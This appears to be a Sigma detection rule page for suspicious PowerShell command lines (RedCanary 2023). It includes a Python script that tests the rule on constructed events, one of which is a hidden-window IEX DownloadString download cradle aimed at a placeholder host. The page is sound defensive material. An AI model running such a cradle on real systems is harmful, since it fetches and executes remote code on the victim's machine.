Suspicious Powershell Commandlets (RedCanary Threat Detection Report)
Detects the execution of powershell.exe with suspicious cmdlets or options. Part of the RedCanary 2023 Threat Detection Report.
Sigma rule
```yaml
title: Suspicious Powershell Commandlets (RedCanary Threat Detection Report)
id: 68490f55-bf8d-489d-995a-5ceae34ce215
status: experimental
description: Detects the execution of powershell.exe with suspicious cmdlets or options. Part of the RedCanary 2023 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/powershell/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2023/05/10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-nop'
            - '-noni'
            - 'invoke-expression'
            - 'iex'
            - '.downloadstring'
            - 'downloadfile'
    condition: selection
falsepositives:
    - Unknown
level: low
```
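The selection above, evaluated in Python against a few constructed process_creation events. This is an added example and not part of the rule or of the SigmaHQ project; only the field names and match terms are taken from the rule. It implements the two Sigma modifiers the rule relies on (`endswith` on Image and `contains` on CommandLine, both case-insensitive by default, with the values under one field OR-ed and the two fields AND-ed) and makes two properties of the rule visible before it is deployed: the `-nop` term also matches the full `-NoProfile` switch that many legitimate scheduled scripts pass, which is one reason the rule carries level low, and the Image filter does not match `pwsh.exe`, so PowerShell 7 launches are outside its scope. The event dictionaries and their labels are constructed sample data.

```python
"""Evaluate this rule's Sigma selection over constructed process_creation events.

Added example: the match terms come from the rule above, the events are
constructed sample data, not real telemetry.
"""

# Field values copied from the rule's `selection` block.
IMAGE_SUFFIX = r"\powershell.exe"
COMMANDLINE_TERMS = [
    "-nop",
    "-noni",
    "invoke-expression",
    "iex",
    ".downloadstring",
    "downloadfile",
]


def matched_terms(event: dict) -> list:
    """Return the CommandLine terms present in the event, in rule order.

    Sigma's `contains` is a case-insensitive substring test, so the command
    line is lower-cased once and each (already lower-case) term is searched.
    """
    cmd = event.get("CommandLine", "").lower()
    return [term for term in COMMANDLINE_TERMS if term in cmd]


def selection_matches(event: dict) -> bool:
    """True when the event satisfies `selection` (and therefore `condition`).

    Image|endswith is case-insensitive as well; a list under one field is an
    OR, the two fields together are an AND.
    """
    image = event.get("Image", "").lower()
    if not image.endswith(IMAGE_SUFFIX):
        return False
    return bool(matched_terms(event))


# Constructed sample events. Only Image and CommandLine matter to the rule;
# the label is for reading the result.
SAMPLE_EVENTS = [
    {
        "label": "download cradle",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -NoP -NonI -W Hidden -c "IEX (New-Object '
                       "Net.WebClient).DownloadString('http://example.invalid/a')\"",
    },
    {
        # Same cradle launched through PowerShell 7: Image does not end in
        # \powershell.exe, so the rule is silent.
        "label": "pwsh cradle",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": 'pwsh.exe -NoP -NonI -c "IEX (New-Object '
                       "Net.WebClient).DownloadString('http://example.invalid/a')\"",
    },
    {
        # Ordinary admin script: -NoProfile contains '-nop', so this fires.
        "label": "admin script",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                       r"-File C:\scripts\backup.ps1",
    },
    {
        "label": "interactive query",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -Command "Get-Process | Sort-Object CPU"',
    },
]


def run(events=SAMPLE_EVENTS) -> list:
    """Return (label, matched terms) for every event the selection matches."""
    return [(e["label"], matched_terms(e)) for e in events if selection_matches(e)]


if __name__ == "__main__":
    for label, terms in run():
        print(f"{label}: {terms}")
```

Running the block prints the two hits ("download cradle" with four terms, "admin script" with only `-nop`) and nothing for the `pwsh.exe` cradle; tuning for a given environment usually means either adding a filter for known `-NoProfile` scheduled tasks or extending the Image condition to cover `\pwsh.exe`, both of which are local decisions the rule leaves open.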
References
- https://redcanary.com/threat-detection-report/techniques/powershell/
Related rules
- Powershell Base64 Encoding (RedCanary Threat Detection Report)
- Powershell Encoded Command Switch (RedCanary Threat Detection Report)
- Powershell Obfuscated Commands (RedCanary Threat Detection Report)
- Invoke-Obfuscation CLIP+ Launcher
- Invoke-Obfuscation COMPRESS OBFUSCATION